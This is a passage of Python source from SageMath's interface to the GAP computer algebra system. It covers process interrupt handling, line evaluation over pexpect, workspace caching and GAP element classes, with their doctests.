Interrupt the GAP process
Gap installs a SIGINT handler, we call it directly instead of
        trying to send Ctrl-C. Unlike
        :meth:`~sage.interfaces.expect.Expect.interrupt`, we only try
        once since we know what we are doing.
Sometimes GAP dies while interrupting.
EXAMPLES::
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: [ gap(i) for i in range(10) ] # check that it is still working
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
TESTS::
sage: gap('"finished computation"'); gap.interrupt(); gap('"ok"')
finished computation
True
ok
"""
E = self._expect
if E is None:
return True
# GAP oddity: If a computation is running and we send Ctrl-C,
# it is stopped as expected. But if we are at the idle prompt,
# nothing is happening UNTIL we run the next command (which is
# then immediately interrupted).
# There is apparently also a race in GAP between the signal
# handler and input, if we don't wait a bit the result is
# unpredictable.
E.sendline(chr(3))
time.sleep(0.1)
E.sendline()
try:
# send a dummy command
E.sendline('224433409;')
# read everything up to the actual output of the command
E.expect(r'@[nf][@J\s>]*224433409', timeout=timeout)
E.send(' ')
# the following input prompt should be the current input
# prompt but GAP might be too confused to display it
# E.expect('@i', timeout=timeout)
# Ideally, we would be finished here. But sometimes GAP
# thinks it is still inside a do/od block. So we run some
# more plain commands to get back into sync. These might
# either complete successfully (output "@n+<number>") or
# return a "Syntax error: od expected@J@f +<number>"
E.sendline()
time.sleep(0.1)
E.sendline('224433437;')
E.expect(r'@[nf][@J\s>]*224433437', timeout=timeout)
E.sendline()
time.sleep(0.1)
E.sendline('224433479;')
E.expect(r'@[nf][@J\s>]*224433479', timeout=timeout)
E.send(' ')
# the following input prompt is now the current input prompt
E.expect('@i', timeout=timeout)
success = True
except (pexpect.TIMEOUT, pexpect.EOF):
# GAP died or hangs indefinitely
success = False
if not success and quit_on_fail:
self.quit()
return success
def _assign_symbol(self):
r"""
Return the assign symbol in GAP.
TESTS::
sage: gap = Gap()
sage: print(gap._assign_symbol())
:=
"""
return ":="
def _quit_string(self):
"""
Returns the string used to quit GAP.
EXAMPLES::
sage: gap._quit_string()
'quit;'
::
sage: g = Gap()
sage: a = g(2); g.is_running()
True
sage: g.quit()
sage: g.is_running()
False
"""
return 'quit;'
def _read_in_file_command(self, filename):
r"""
        Returns the command used to read in a file in GAP.
EXAMPLES::
sage: gap._read_in_file_command('test')
'Read("test");'
::
sage: filename = tmp_filename()
sage: with open(filename, 'w') as f:
....: _ = f.write('xx := 22;\n')
sage: gap.read(filename)
sage: gap.get('xx').strip()
'22'
"""
return 'Read("%s");' % filename
def _continuation_prompt(self):
"""
Returns the continuation prompt in GAP.
EXAMPLES::
sage: gap._continuation_prompt()
'> '
"""
return '> '
def load_package(self, pkg, verbose=False):
"""
Load the Gap package with the given name.
If loading fails, raise a RuntimeError exception.
TESTS::
sage: gap.load_package("chevie")
Traceback (most recent call last):
...
RuntimeError: Error loading Gap package chevie. You may want to install gap_packages SPKG.
"""
if verbose:
print("Loading GAP package {}".format(pkg))
x = self.eval('LoadPackage("{}")'.format(pkg))
if x == 'fail':
raise RuntimeError("Error loading Gap package "+str(pkg)+". "+
"You may want to install gap_packages SPKG.")
def eval(self, x, newlines=False, strip=True, split_lines=True, **kwds):
r"""
        Send the code in the string ``x`` to the GAP interpreter and return the
        output as a string.
        INPUT:
        - ``x`` - string containing GAP code.
        - ``newlines`` - bool (default: False); if False,
remove all backslash-newlines inserted by the GAP output
formatter.
- ``strip`` - ignored
- ``split_lines`` -- bool (default: True); if True then each
line is evaluated separately. If False, then the whole
block of code is evaluated all at once.
EXAMPLES::
sage: gap.eval('2+2')
'4'
sage: gap.eval('Print(4); #test\n Print(6);')
'46'
sage: gap.eval('Print("#"); Print(6);')
'#6'
sage: gap.eval('4; \n 6;')
'4\n6'
sage: gap.eval('if 3>2 then\nPrint("hi");\nfi;')
'hi'
sage: gap.eval('## this is a test\nPrint("OK")')
'OK'
sage: gap.eval('Print("This is a test. Oh no, a #");# but this is a comment\nPrint("OK")')
'This is a test. Oh no, a #OK'
sage: gap.eval('if 4>3 then')
''
sage: gap.eval('Print("Hi how are you?")')
'Hi how are you?'
sage: gap.eval('fi')
''
TESTS:
Whitespace is not stripped from the front of the result
(:trac:`28439`)::
sage: gap.eval(r'Print(" -\n\\\\- ")')
' -\n\\\\-'
"""
# '"
#We remove all of the comments: On each line, we try
#to find a pound sign. If we find it, we check to see if
#it is occurring in a string. If it is not in a string, we
#strip off the comment.
if not split_lines:
input_line=str(x)
else:
input_line = ""
for line in str(x).rstrip().split('\n'):
pound_position = line.find('#')
while pound_position != -1:
if not is_in_string(line, pound_position):
line = line[:pound_position]
pound_position = line.find('#',pound_position+1)
input_line += " "+line
if not input_line.endswith(';'):
input_line += ';'
result = Expect.eval(self, input_line, **kwds)
if not newlines:
result = result.replace("\\\n","")
return result.rstrip()
def _execute_line(self, line, wait_for_prompt=True, expect_eof=False):
if self._expect is None: # interface is down
self._start()
E = self._expect
try:
if len(line) > 4095:
raise RuntimeError("Passing commands this long to gap would hang")
E.sendline(line)
except OSError:
raise RuntimeError("Error evaluating %s in %s"%(line, self))
if not wait_for_prompt:
return (b'',b'')
if len(line)==0:
return (b'',b'')
try:
terminal_echo = [] # to be discarded
normal_outputs = [] # GAP stdout
error_outputs = [] # GAP stderr
current_outputs = terminal_echo
while True:
x = E.expect_list(self._compiled_full_pattern)
current_outputs.append(E.before)
if x == 0: # @p
if E.after != b'@p1.':
warnings.warn(
"possibly wrong version of GAP package "
"interface. Crossing fingers and continuing.")
elif x == 1: #@@
current_outputs.append(b'@')
elif x == 2: #special char
c = ord(E.after[1:2]) - ord(b'A') + 1
s = bytes([c])
current_outputs.append(s)
elif x == 3: # garbage collection info, ignore
pass
elif x == 4: # @e -- break loop
E.sendline("quit;")
elif x == 5: # @c completion, doesn't seem to happen when -p is in use
warnings.warn("I didn't think GAP could do this")
elif x == 6: # @f GAP error message
current_outputs = error_outputs
elif x == 7: # @h help text, but this stopped happening with new help
warnings.warn("I didn't think GAP could do this")
elif x == 8: # @i awaiting normal input
break
elif x == 9: # @m finished running a child
pass # there is no need to do anything
elif x==10: #@n normal output line
current_outputs = normal_outputs
elif x==11: #@r echoing input
current_outputs = terminal_echo
elif x==12: #@sN shouldn't happen
warnings.warn("this should never happen")
elif x==13: #@w GAP is trying to send a Window command
warnings.warn("this should never happen")
elif x ==14: #@x seems to be safely ignorable
pass
elif x == 15:#@z GAP starting a subprocess
pass # there is no need to do anything
except pexpect.EOF:
if not expect_eof:
raise RuntimeError("Unexpected EOF from %s executing %s"%(self,line))
except IOError:
raise RuntimeError("IO Error from %s executing %s"%(self,line))
return (b"".join(normal_outputs), b"".join(error_outputs))
def _keyboard_interrupt(self):
"""
TESTS:
We check that the gap interface behaves correctly after an
interrupt::
sage: gap(2)
2
sage: try:
....: alarm(0.5)
....: gap.eval('while(1=1) do i:=1;; od;', wait_for_prompt=True)
....: except KeyboardInterrupt:
....: pass
sage: gap(2)
2
"""
self.quit()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def _eval_line(self, line, allow_use_file=True, wait_for_prompt=True, restart_if_needed=True):
r"""
Evaluate a line of commands.
REMARK:
By default, a long command (length exceeding ``self._eval_using_file_cutoff``)
is evaluated using :meth:`_eval_line_using_file`.
If the command can not be evaluated since the interface
has crashed, it is automatically restarted and tried
again *once*.
If the optional ``wait_for_prompt`` is ``False`` then even a very long line
will not be evaluated by :meth:`_eval_line_using_file`, since this does not
support the ``wait_for_prompt`` option.
INPUT:
- ``line`` -- (string) a command.
        - ``allow_use_file`` (optional bool, default ``True``) --
          allow evaluating long commands using :meth:`_eval_line_using_file`.
- ``wait_for_prompt`` (optional bool, default ``True``) --
wait until the prompt appears in the sub-process' output.
- ``restart_if_needed`` (optional bool, default ``True``) --
          If it is ``True``, the command is evaluated a second
          time after restarting the interface, if an
``EOFError`` occurred.
TESTS::
sage: gap._eval_line('2+2;')
'4'
We test the ``wait_for_prompt`` option by sending a command that
creates an infinite loop in the GAP sub-process. But if we don't
wait for the prompt to appear in the output, we can interrupt
the loop without raising a KeyboardInterrupt. At the same time,
we test that the line is not forwarded to :meth:`_eval_line_using_file`,
since that method would not support the ``wait_for_prompt`` option::
sage: cutoff = gap._eval_using_file_cutoff
sage: gap._eval_using_file_cutoff = 4
sage: gap._eval_line('while(1=1) do i:=1;; od;', wait_for_prompt=False)
''
sage: rc = gap.interrupt(timeout=1)
sage: gap._eval_using_file_cutoff = cutoff
The following tests against a bug fixed at :trac:`10296`::
sage: gap(3)
3
sage: gap.eval('quit;')
''
sage: a = gap(3)
** Gap crashed or quit executing '\$sage...:=3;;' **
Restarting Gap and trying again
sage: a
3
"""
expect_eof = self._quit_string() in line
try:
if self._expect is None:
self._start()
if allow_use_file and wait_for_prompt and len(line) > self._eval_using_file_cutoff:
return self._eval_line_using_file(line)
(normal, error) = self._execute_line(line, wait_for_prompt=wait_for_prompt,
expect_eof=expect_eof)
# The internal method _execute_line returns bytes but the bytes it
# returns should contain text (any terminal commands and other
# garbage should be filtered out by this point); here we decode
# them (on Python 3), currently just using the default encoding
normal, error = bytes_to_str(normal), bytes_to_str(error)
if len(error):
if 'Error, Rebuild completion files!' in error:
error += "\nRunning gap_reset_workspace()..."
self.quit()
gap_reset_workspace()
error = error.replace('\r','')
raise RuntimeError("%s produced error output\n%s\n executing %s"%(self, error,line))
if not len(normal):
return ''
            if isinstance(wait_for_prompt, str) and normal.endswith(wait_for_prompt):
n = len(wait_for_prompt)
elif normal.endswith(bytes_to_str(self._prompt)):
n = len(self._prompt)
elif normal.endswith(self._continuation_prompt()):
n = len(self._continuation_prompt())
else:
n = 0
out = normal[:-n]
if len(out) and out[-1] == "\n":
out = out[:-1]
return out
except (RuntimeError, TypeError, pexpect.ExceptionPexpect) as exc:
if not self._isalive():
# We can't distinguish just EOF from an unexpectedly killed
                # process because pexpect catches EOFs and re-raises them
# But if we *were* expecting EOF then we should just let it
# fail silently and return
if expect_eof:
return ''
print("** %s crashed or quit executing '%s' **" % (self, line))
print("Restarting %s and trying again" % self)
self._start()
if line != '':
return self._eval_line(line, allow_use_file=allow_use_file)
else:
return ''
else:
raise RuntimeError(exc)
except KeyboardInterrupt:
self._keyboard_interrupt()
raise KeyboardInterrupt("Ctrl-c pressed while running %s"%self)
def unbind(self, var):
"""
Clear the variable named var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
sage: gap.unbind('x')
sage: gap.get('x')
Traceback (most recent call last):
...
RuntimeError: Gap produced error output
Error, Variable: 'x' must have a value
...
"""
self.eval('Unbind(%s)'%var)
self.clear(var)
def _contains(self, v1, v2):
"""
EXAMPLES::
sage: Integers = gap('Integers')
sage: two = gap(2)
sage: gap._contains(two.name(), Integers.name())
True
::
sage: 2 in gap('Integers')
True
"""
return self.eval('%s in %s'%(v1,v2)) == "true"
def _true_symbol(self):
"""
Returns the symbol for truth in GAP.
EXAMPLES::
sage: gap._true_symbol()
'true'
sage: gap(2) == gap(2)
True
"""
return "true"
def _false_symbol(self):
"""
Returns the symbol for falsity in GAP.
EXAMPLES::
sage: gap._false_symbol()
'false'
sage: gap(2) == gap(3)
False
"""
return "false"
def _equality_symbol(self):
"""
Returns the symbol for equality in GAP.
EXAMPLES::
sage: gap._equality_symbol()
'='
sage: gap(2) == gap(3)
False
sage: gap(2) == gap(2)
True
"""
return "="
def version(self):
"""
Returns the version of GAP being used.
EXAMPLES::
sage: print(gap.version())
4...
"""
return self.eval('GAPInfo.Version')[1:-1]
def function_call(self, function, args=None, kwds=None):
"""
Calls the GAP function with args and kwds.
EXAMPLES::
sage: gap.function_call('SymmetricGroup', [5])
SymmetricGroup( [ 1 .. 5 ] )
If the GAP function does not return a value, but prints something
to the screen, then a string of the printed output is returned.
::
sage: s = gap.function_call('Display', [gap.SymmetricGroup(5).CharacterTable()])
sage: type(s)
<class 'sage.interfaces.interface.AsciiArtString'>
sage: s.startswith('CT')
True
TESTS:
If the function call is too long, two ``gap.eval`` calls are made
since returned values from commands in a file cannot be handled
properly::
sage: g = Gap()
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_very_very_very_long_name')) # random
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
When the command itself is so long that it warrants use of a temporary
file to be communicated to GAP, this does not cause problems since
the file will contain a single command::
sage: g.function_call("ConjugacyClassesSubgroups", sage.interfaces.gap.GapElement(g, 'SymmetricGroup(2)', name = 'a_variable_with_a_name_so_very_very_very_long_that_even_by_itself_will_make_expect_use_a_file')) # random
[ ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( () )),
ConjugacyClassSubgroups(SymmetricGroup( [ 1 .. 2 ] ),Group( [ (1,2) ] )) ]
"""
args, kwds = self._convert_args_kwds(args, kwds)
self._check_valid_function_name(function)
#Here we have to do some magic because not all GAP
#functions return a value. If you try to store their
#results to a variable, then GAP will complain. Thus, before
#we evaluate the function, we make it so that the marker string
#is in the 'last' variable in GAP. If the function returns a
#value, then that value will be in 'last', otherwise it will
#be the marker.
marker = '__SAGE_LAST__:="__SAGE_LAST__";;'
cmd = "%s(%s);;"%(function, ",".join([s.name() for s in args]+
['%s=%s'%(key,value.name()) for key, value in kwds.items()]))
if len(marker) + len(cmd) <= self._eval_using_file_cutoff:
# We combine the two commands so we only run eval() once and the
# only output would be from the second command
res = self.eval(marker+cmd)
else:
self.eval(marker)
res = self.eval(cmd)
if self.eval(self._identical_function + '(last,__SAGE_LAST__)') != 'true':
return self.new('last2;')
else:
if res.strip():
from sage.interfaces.interface import AsciiArtString
return AsciiArtString(res)
def get_record_element(self, record, name):
r"""
Return the element of a GAP record identified by ``name``.
INPUT:
- ``record`` -- a GAP record
- ``name`` -- str
OUTPUT:
- :class:`GapElement`
EXAMPLES::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: gap.get_record_element(rec, 'a')
1
sage: gap.get_record_element(rec, 'b')
2
TESTS::
sage: rec = gap('rec( a := 1, b := "2" )')
sage: type(gap.get_record_element(rec, 'a'))
<class 'sage.interfaces.gap.GapElement'>
"""
return self('%s.%s' % (record.name(), name))
# We need to inherit from ModuleElement to support
# sage.structure.coerce_actions.ModuleAction and it needs to be first
# in the MRO because extension types should always come first.
@instancedoc
class GapElement_generic(ModuleElement, ExtraTabCompletion, ExpectElement):
r"""
Generic interface to the GAP3/GAP4 interpreters.
AUTHORS:
- William Stein and David Joyner (interface for GAP4)
- Franco Saliola (Feb 2010): refactored to separate out the generic
code
"""
def _add_(self, other):
"""
EXAMPLES::
sage: a = gap(1)
sage: a + a
2
"""
# This is just a copy of ExpectElement._add_ to fix the fact
# that the abstract method ModuleElement._add_ comes first in
# the MRO.
return self._operation("+", other)
def __bool__(self):
"""
EXAMPLES::
sage: bool(gap(2))
True
sage: gap(0).bool()
False
sage: gap('false').bool()
False
"""
P = self._check_valid()
return self != P(0) and repr(self) != 'false'
__nonzero__ = __bool__
def __len__(self):
"""
EXAMPLES::
sage: v = gap('[1,2,3]'); v
[ 1, 2, 3 ]
sage: len(v)
3
len is also called implicitly by if::
sage: if gap('1+1 = 2'):
....: print("1 plus 1 does equal 2")
1 plus 1 does equal 2
::
sage: if gap('1+1 = 3'):
....: print("it is true")
....: else:
....: print("it is false")
it is false
"""
P = self.parent()
if P.eval('%s = true'%self.name()) == 'true':
return 1
elif P.eval('%s = false'%self.name()) == 'true':
return 0
else:
return int(self.Length())
def is_string(self):
"""
Tell whether this element is a string.
EXAMPLES::
sage: gap('"abc"').is_string()
True
sage: gap('[1,2,3]').is_string()
False
"""
return bool(self.IsString())
def _matrix_(self, R):
r"""
Return matrix over the (Sage) ring R determined by self, where self
should be a Gap matrix.
EXAMPLES::
sage: s = gap("(Z(7)^0)*[[1,2,3],[4,5,6]]"); s
[ [ Z(7)^0, Z(7)^2, Z(7) ], [ Z(7)^4, Z(7)^5, Z(7)^3 ] ]
sage: s._matrix_(GF(7))
[1 2 3]
[4 5 6]
::
sage: s = gap("[[1,2], [3/4, 5/6]]"); s
[ [ 1, 2 ], [ 3/4, 5/6 ] ]
sage: m = s._matrix_(QQ); m
[ 1 2]
[3/4 5/6]
sage: parent(m)
Full MatrixSpace of 2 by 2 dense matrices over Rational Field
::
sage: s = gap('[[Z(16),Z(16)^2],[Z(16)^3,Z(16)]]')
sage: s._matrix_(GF(16,'a'))
[ a a^2]
[a^3 a]
"""
v = self.DimensionsMat()
n = int(v[1])
m = int(v[2])
from sage.matrix.matrix_space import MatrixSpace
M = MatrixSpace(R, n, m)
entries = [[R(self[r,c]) for c in range(1,m+1)] for r in range(1,n+1)]
return M(entries)
############
class Gap(Gap_generic):
r"""
Interface to the GAP interpreter.
AUTHORS:
- William Stein and David Joyner
"""
def __init__(self, max_workspace_size=None,
maxread=None, script_subdirectory=None,
use_workspace_cache=True,
server=None,
server_tmpdir=None,
logfile=None,
seed=None,
env={}):
"""
EXAMPLES::
sage: gap == loads(dumps(gap))
True
"""
self.__use_workspace_cache = use_workspace_cache
cmd, self.__make_workspace = gap_command(use_workspace_cache, server is None)
# -b: suppress banner
# -p: enable "package output mode"; this confusingly named option
# causes GAP to output special control characters that are normally
# intended for communication with a window manager (i.e. for xgap)
# but that we also use to control GAP with pexepect
# -T: disable interactive break loop when encountering errors
# -E: disable readline support
cmd += " -b -p -T -E"
cmd += ' -m 64m ' # attempt at a workaround for http://tracker.gap-system.org/issues/224
cmd += ' ' + os.path.join(SAGE_EXTCODE, 'gap', 'sage.g')
Expect.__init__(self,
name='gap',
prompt='gap> ',
command=cmd,
maxread=maxread,
server=server,
server_tmpdir=server_tmpdir,
script_subdirectory=script_subdirectory,
restart_on_ctrlc=True,
verbose_start=False,
logfile=logfile,
eval_using_file_cutoff=100,
env=env)
self.__seq = 0
self._seed = seed
def set_seed(self,seed=None):
"""
Set the seed for gap interpreter.
The seed should be an integer.
EXAMPLES::
sage: g = Gap()
sage: g.set_seed(0)
0
sage: [g.Random(1,10) for i in range(5)]
[2, 3, 3, 4, 2]
"""
if seed is None:
seed = self.rand_seed()
self.eval("Reset(GlobalMersenneTwister,%d);;" % seed)
self.eval("Reset(GlobalRandomSource,%d);;" % seed)
self._seed = seed
return seed
def __reduce__(self):
"""
EXAMPLES::
sage: gap.__reduce__()
(<function reduce_load_GAP at 0x...>, ())
sage: f, args = _
sage: f(*args)
Gap
"""
return reduce_load_GAP, tuple([])
def _next_var_name(self):
r"""
Returns the next unused variable name.
Note that names starting with dollar signs are valid GAP
identifiers, but need to be escaped with a backslash starting
with GAP-4.8.
EXAMPLES::
sage: g = Gap()
sage: g._next_var_name()
'\\$sage1'
sage: g(2)^2
4
sage: g._next_var_name()
'\\$sage...'
"""
if len(self._available_vars) != 0:
v = self._available_vars[0]
del self._available_vars[0]
return v
self.__seq += 1
return r'\$sage%s'%self.__seq
def _start(self):
"""
EXAMPLES::
sage: g = Gap()
sage: g.is_running()
False
sage: g._start()
sage: g.is_running()
True
sage: g.quit()
"""
if self.__use_workspace_cache:
from sage.libs.gap.saved_workspace import timestamp
try:
# Check to see if we need to auto-regenerate the gap
# workspace, i.e., if the gap script is more recent
# than the saved workspace, which signals that gap has
# been upgraded.
if os.path.getmtime(WORKSPACE) < timestamp():
raise OSError("GAP workspace too old")
# Set the modification time of the workspace to the
# current time. This ensures the workspace doesn't
# get deleted too soon by gap_reset_workspace().
os.utime(WORKSPACE, None)
except OSError:
gap_reset_workspace(verbose=False)
global first_try
n = self._session_number
try:
Expect._start(self, "Failed to start GAP.")
except Exception:
if self.__use_workspace_cache and first_try:
first_try = False
self.quit()
gap_reset_workspace(verbose=False)
Expect._start(self, "Failed to start GAP.")
self._session_number = n
self.__make_workspace = False
else:
raise
if self.__use_workspace_cache and self.__make_workspace:
self.save_workspace()
# Now, as self._expect exists, we can compile some useful pattern:
self._compiled_full_pattern = self._expect.compile_pattern_list([
r'@p\d+\.','@@','@[A-Z]',r'@[123456!"#$%&][^+]*\+',
'@e','@c','@f','@h','@i','@m','@n','@r',r'@s\d',r'@w.*\+','@x','@z'])
# read everything up to the first "ready" prompt
self._expect.expect("@i")
# set random seed
self.set_seed(self._seed)
def _function_class(self):
"""
Returns the GapFunction class.
EXAMPLES::
sage: gap._function_class()
<class 'sage.interfaces.gap.GapFunction'>
::
sage: type(gap.Order)
<class 'sage.interfaces.gap.GapFunction'>
"""
return GapFunction
def cputime(self, t=None):
r"""
Returns the amount of CPU time that the GAP session has used. If
``t`` is not None, then it returns the difference
between the current CPU time and ``t``.
EXAMPLES::
sage: t = gap.cputime()
sage: t #random
0.13600000000000001
sage: gap.Order(gap.SymmetricGroup(5))
120
sage: gap.cputime(t) #random
0.059999999999999998
"""
if t is not None:
return self.cputime() - t
else:
self.eval('_r_ := Runtimes();')
r = sum(eval(self.eval('[_r_.user_time, _r_.system_time, _r_.user_time_children, _r_.system_time_children]')))
return r/1000.0
def save_workspace(self):
r"""
Save the GAP workspace.
TESTS:
We make sure that :trac:`9938` (GAP does not start if the path
to the GAP workspace file contains more than 82 characters) is
fixed::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = os.path.join(SAGE_TMP, "gap" + "0"*(80-len(SAGE_TMP)))
sage: gap = Gap()
sage: gap('3+2') # long time (4s on sage.math, 2013)
5
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
prepare_workspace_dir()
# According to the GAP Reference Manual,
# [https://www.gap-system.org/Manuals/doc/htm/ref/CHAP003.htm#SSEC011.1]
# SaveWorkspace can only be used at the main gap> prompt. It cannot
# be included in the body of a loop or function, or called from a
# break loop.
from sage.misc.temporary_file import atomic_write
with atomic_write(WORKSPACE) as f:
f.close()
self.eval('SaveWorkspace("%s");'%(f.name), allow_use_file=False)
# Todo -- this -- but there is a tricky "when does it end" issue!
# Maybe do via a file somehow?
def help(self, s, pager=True):
"""
Print help on a given topic.
EXAMPLES:
Note: In order to ensure consistent unicode handling from GAP we
start a GAP instance with a forced UTF-8 locale::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.help('SymmetricGroup', pager=False))
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
<BLANKLINE>
"""
if self.is_remote():
tmp_to_use = self._remote_tmpfile()
else:
tmp_to_use = self._local_tmpfile()
self.eval('SetGAPDocTextTheme("none")')
gap_encoding = str(self('GAPInfo.TermEncoding;'))
self.eval(r'\$SAGE.tempfile := "%s";' % tmp_to_use)
line = Expect.eval(self, "? %s" % s)
Expect.eval(self, "? 1")
match = re.search(r"Page from (\d+)", line)
if match is None:
print(line)
else:
(sline,) = match.groups()
sline = int(sline) - 1
if self.is_remote():
self._get_tmpfile()
with io.open(self._local_tmpfile(), "r",
encoding=gap_encoding) as fobj:
help = fobj.read()
if pager:
from IPython.core.page import page
page(help, start=sline)
else:
# Find the n-th line and return from there
idx = -1
while sline:
idx = help.find('\n', idx + 1)
if idx == -1:
# str.find returned -1, so we ran out of lines early;
# this shouldn't happen though
break
sline -= 1
return help[idx:]
def set(self, var, value):
"""
Set the variable var to the given value.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
cmd = ('%s:=%s;;' % (var, value)).replace('\n','')
self._eval_line(cmd, allow_use_file=True)
def get(self, var, use_file=False):
"""
Get the string representation of the variable var.
EXAMPLES::
sage: gap.set('x', '2')
sage: gap.get('x')
'2'
"""
if use_file:
tmp = self._local_tmpfile()
if os.path.exists(tmp):
os.unlink(tmp)
self.eval('PrintTo("%s", %s);'%(tmp,var), strip=False)
with open(tmp) as f:
r = f.read()
r = r.strip().replace("\\\n","")
os.unlink(tmp)
return r
else:
return self.eval('Print(%s);'%var, newlines=False)
def _pre_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StartInteract();')
def _post_interact(self):
"""
EXAMPLES::
sage: gap._pre_interact()
sage: gap._post_interact()
"""
self._eval_line(r'\$SAGE.StopInteract();')
def _eval_line_using_file(self, line):
i = line.find(':=')
if i != -1:
j = line.find('"')
if j >= 0 and j < i:
i = -1
if i == -1:
line0 = 'Print( %s );'%line.rstrip().rstrip(';')
try: # this is necessary, since Print requires something as input, and some functions (e.g., Read) return nothing.
return Expect._eval_line_using_file(self, line0)
except RuntimeError:
return ''
return Expect._eval_line_using_file(self, line)
def console(self):
"""
Spawn a new GAP command-line session.
EXAMPLES::
sage: gap.console() # not tested
********* GAP, Version 4.5.7 of 14-Dec-2012 (free software, GPL)
* GAP * https://www.gap-system.org
********* Architecture: x86_64-unknown-linux-gnu-gcc-default64
Libs used: gmp, readline
Loading the library and packages ...
Packages: GAPDoc 1.5.1
Try '?help' for help. See also '?copyright' and '?authors'
gap>
"""
gap_console()
def _object_class(self):
"""
Returns the GapElement class.
EXAMPLES::
sage: gap._object_class()
<class 'sage.interfaces.gap.GapElement'>
sage: type(gap(2))
<class 'sage.interfaces.gap.GapElement'>
"""
return GapElement
def _function_element_class(self):
"""
Returns the GapFunctionElement class.
EXAMPLES::
sage: gap._function_element_class()
<class 'sage.interfaces.gap.GapFunctionElement'>
sage: type(gap.SymmetricGroup(4).Order)
<class 'sage.interfaces.gap.GapFunctionElement'>
"""
return GapFunctionElement
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: '{}' in gap._tab_completion()
False
sage: c = gap._tab_completion()
sage: len(c) > 100
True
sage: 'Order' in c
True
"""
names = eval(self.eval('NamesSystemGVars()')) + \
eval(self.eval('NamesUserGVars()'))
return [n for n in names if n[0] in string.ascii_letters]
############
def gap_reset_workspace(max_workspace_size=None, verbose=False):
r"""
Call this to completely reset the GAP workspace, which is used by
default when Sage first starts GAP.
The first time you start GAP from Sage, it saves the startup state
of GAP in a file ``$HOME/.sage/gap/workspace-gap-HASH``, where ``HASH``
is a hash of the directory where Sage is installed.
This is useful, since then subsequent startup of GAP is at least 10
times as fast. Unfortunately, if you install any new code for GAP,
it won't be noticed unless you explicitly load it, e.g., with
gap.load_package("my_package")
The packages sonata, guava, factint, gapdoc, grape, design, toric,
and laguna are loaded in all cases before the workspace is saved,
if they are available.
TESTS:
Check that the race condition from :trac:`14242` has been fixed.
We temporarily need to change the worksheet filename. ::
sage: ORIGINAL_WORKSPACE = sage.interfaces.gap.WORKSPACE
sage: sage.interfaces.gap.WORKSPACE = tmp_filename()
sage: from multiprocessing import Process
sage: import time
sage: gap = Gap() # long time (reset GAP session)
sage: P = [Process(target=gap, args=("14242",)) for i in range(4)]
sage: for p in P: # long time, indirect doctest
....: p.start()
....: time.sleep(float(0.2))
sage: for p in P: # long time
....: p.join()
sage: os.unlink(sage.interfaces.gap.WORKSPACE) # long time
sage: sage.interfaces.gap.WORKSPACE = ORIGINAL_WORKSPACE
"""
# Create new workspace with filename WORKSPACE
g = Gap(use_workspace_cache=False, max_workspace_size=None)
g.eval('SetUserPreference("HistoryMaxLines", 30)')
from sage.tests.gap_packages import all_installed_packages
for pkg in all_installed_packages(gap=g):
try:
g.load_package(pkg, verbose=verbose)
except RuntimeError as msg:
if verbose:
print('*** %s' % msg)
# end for
g.save_workspace()
g.quit()
@instancedoc
class GapElement(GapElement_generic):
def __getitem__(self, n):
"""
EXAMPLES::
sage: a = gap([1,2,3])
sage: a[1]
1
"""
self._check_valid()
if not isinstance(n, tuple):
return self.parent().new('%s[%s]' % (self._name, n))
return self.parent().new('%s%s' % (self._name,
''.join('[%s]' % x for x in n)))
def str(self, use_file=False):
"""
EXAMPLES::
sage: print(gap(2))
2
"""
if use_file:
P = self._check_valid()
return P.get(self.name(), use_file=True)
else:
return repr(self)
def _latex_(self):
r"""
EXAMPLES::
sage: s = gap("[[1,2], [3/4, 5/6]]")
sage: latex(s)
\left(\begin{array}{rr} 1&2\\ 3/4&\frac{5}{6}\\ \end{array}\right)
"""
P = self._check_valid()
try:
s = P.eval('LaTeXObj(%s)'%self.name())
s = s.replace('\\\\','\\').replace('"','')
s = s.replace('%\\n',' ')
return s
except RuntimeError:
return str(self)
@cached_method
def _tab_completion(self):
"""
Return additional tab completion entries
OUTPUT:
List of strings
EXAMPLES::
sage: s5 = gap.SymmetricGroup(5)
sage: 'Centralizer' in s5._tab_completion()
True
"""
P = self.parent()
v = P.eval(r'\$SAGE.OperationsAdmittingFirstArgument(%s)'%self.name())
v = v.replace('Tester(','').replace('Setter(','').replace(')','').replace('\n', '')
v = v.split(',')
v = [ oper.split('"')[1] for oper in v ]
v = [ oper for oper in v if all(ch in string.ascii_letters for ch in oper) ]
return sorted(set(v))
@instancedoc
class GapFunctionElement(FunctionElement):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap(4).SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._obj.parent()
help = M.help(self._name, pager=False)
return help
@instancedoc
class GapFunction(ExpectFunction):
def _instancedoc_(self):
"""
EXAMPLES::
sage: gap = Gap(env={'LC_CTYPE': 'en_US.UTF-8'})
sage: print(gap.SymmetricGroup.__doc__)
<BLANKLINE>
50.1-... SymmetricGroup
<BLANKLINE>
‣ SymmetricGroup( [filt, ]deg ) ─────────────────────────────────── function
...
"""
M = self._parent
